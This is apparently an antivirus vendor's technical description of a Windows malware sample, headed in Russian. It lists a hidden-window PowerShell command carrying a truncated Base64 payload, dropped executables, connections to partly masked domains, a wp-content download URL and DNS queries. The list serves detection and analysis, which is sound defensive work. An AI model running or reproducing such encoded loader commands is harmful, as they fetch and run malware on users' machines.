Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABRAHYAdQBlAHoAeQBsAGkAYgA9ACcAQgB3AGIAYQBhAGoAcABkAGgAbwB2AG8AJwA7ACQARwBhAGQAZwBnAG4AYgBsAGgAbABoAGEAZAAgAD0AIAAnADcAOAAyACcAOwAkAEIAZQB3AGwAYwB5AHAAagBjAHM...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\960544.cvr
- %HOMEPATH%\782.exe
- %HOMEPATH%\782.exe
- 'si####ibitkiler.com':80
- 'ab###.technode.com':443
- 'tr#####antasydmc.com':443
- 'ca####e-daher.com':443
- http://si####ibitkiler.com/wp-content/494onp/
- 'ab###.technode.com':443
- 'tr#####antasydmc.com':443
- 'ca####e-daher.com':443
- DNS ASK si####ibitkiler.com
- DNS ASK ab###.technode.com
- DNS ASK tr#####antasydmc.com
- DNS ASK ta###sojib.com
- DNS ASK ca####e-daher.com